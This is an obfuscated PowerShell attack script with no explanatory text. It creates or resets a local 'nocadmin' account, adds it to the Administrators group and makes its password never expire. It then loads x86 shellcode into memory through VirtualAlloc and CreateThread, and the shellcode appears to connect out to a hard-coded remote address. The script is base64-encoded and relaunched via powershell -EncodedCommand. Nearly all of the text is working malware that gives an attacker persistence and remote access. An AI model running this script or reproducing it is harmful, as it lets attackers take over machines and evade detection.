  .('sv') ("m"+"OS")  (  [tYPE]("{0}{1}{3}{2}" -F 'S','YST','NVErt','em.Co')  ); ${A`NVl}  =  [Type]("{0}{3}{4}{1}{2}" -F 'sySteM.','i','NG','T','Ext.eNcOD')  ;  .("{1}{0}{2}" -f 'Te','SeT-i','M') VariAble:M3Vsu (  [TYPE]("{1}{0}" -f 'R','inTpT')  );  ${uSe`Rna`mE} = ("{0}{2}{1}"-f 'n','cadmin','o')
${pAsSw`O`Rd} = ("{0}{2}{3}{4}{1}"-f'AD','E','MIN-','PASSWO','RD-HER')

${Gr`O`Up} = ("{1}{3}{0}{2}"-f 'tra','Admin','tors','is')

${ad`sI} = [ADSI]"WinNT://$env:COMPUTERNAME"
${e`Xi`Sting} = ${A`dsi}."chI`L`drEN" | &("{2}{0}{1}" -f'Objec','t','Where-') {${_}."S`C`heMACla`ss`Name" -eq ("{1}{0}" -f'er','us') -and ${_}."N`AmE" -eq ${us`e`RnAMe} }

if (${Nu`LL} -eq ${eX`IsTi`NG}) {

    .("{0}{2}{1}" -f'Wri','st','te-Ho') ('C'+'reat'+'ing '+'n'+'ew '+'lo'+'cal '+'u'+'ser '+"$Username.")
    & ("{0}{1}" -f'N','ET') ("{1}{0}" -f 'R','USE') ${USe`R`N`AME} ${P`Ass`wOrd} ("{1}{0}" -f'add','/') ('/y') ("{0}{4}{2}{3}{1}" -f'/ex','r',':n','eve','pires')
    
    &("{3}{2}{1}{0}" -f'-Host','e','it','Wr') ('A'+'ddin'+'g '+'l'+'o'+'cal '+'us'+'er '+"$Username "+'to'+' '+"$group.")
    & ("{1}{0}"-f'T','NE') ("{1}{2}{0}" -f 'UP','LOCALG','RO') ${GRo`UP} ${UseR`NAmE} ("{1}{0}" -f 'd','/ad')

}
else {
    &("{2}{0}{1}"-f'e-Ho','st','Writ') ('Setti'+'ng'+' '+'passw'+'ord'+' '+'fo'+'r '+'e'+'xist'+'ing '+'lo'+'cal '+'us'+'er '+"$Username.")
    ${eXiSt`i`Ng}.("{1}{2}{0}{3}"-f 'r','Set','Passwo','d').Invoke(${paSsw`O`RD})
}

&("{3}{1}{0}{2}"-f'H','-','ost','Write') ('Ensurin'+'g'+' '+'passw'+'o'+'rd '+'for'+' '+"$Username "+'nev'+'e'+'r '+'exp'+'ires.')
& ("{0}{1}" -f'W','MIC') ("{2}{3}{1}{0}" -f 'OUNT','CC','US','ERA') ("{0}{1}" -f 'W','HERE') "Name='$Username'" ("{0}{1}"-f 'S','ET') ("{2}{0}{3}{4}{5}{1}{6}"-f'asswordEx','AL','P','pir','es=','F','SE')   
${e`x`Rgl9} = '$cSE = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $cSE -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x5d,0x03,0x93,0x78,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$ZIA=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($ZIA.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$ZIA,0,0,0);for (;;){Start-sleep 60};';${e} =   ( &("{0}{1}"-f 'DI','r') ('V'+'ARI'+'able:moS') )."Va`Lue"::"toBaS`e6`4S`TriNg"( ${A`NvL}::"uni`Co`De".("{2}{0}{1}"-f 'etBy','tes','G').Invoke(${eXR`g`L9}));${e`xrg} = ("{2}{3}{1}{0}"-f'd ','edComman','-Enc','od');if( (&("{0}{2}{1}" -f'v','Le','arIaB')  m3Vsu  -VAluEonL)::"Si`Ze" -eq 8){${W8`JB} = ${ENV`:s`Ys`T`emroot} + ((("{2}{1}{7}{11}{8}{9}{3}{4}{10}{0}{5}{6}{12}"-f 'Ep','o','ydEsysw','elly','d','owersh','e','w64ydE','wsPowerS','h','Ev1.0yd','Windo','ll'))."ReP`l`Ace"(([chAR]121+[chAR]100+[chAR]69),'\'));.("{0}{1}"-f 'ie','x') ('& '+"$w8jB "+"$EXRG "+"$e")}else{;&("{0}{1}" -f 'ie','x') ('& '+'p'+'owers'+'he'+'ll '+"$EXRG "+"$e");}
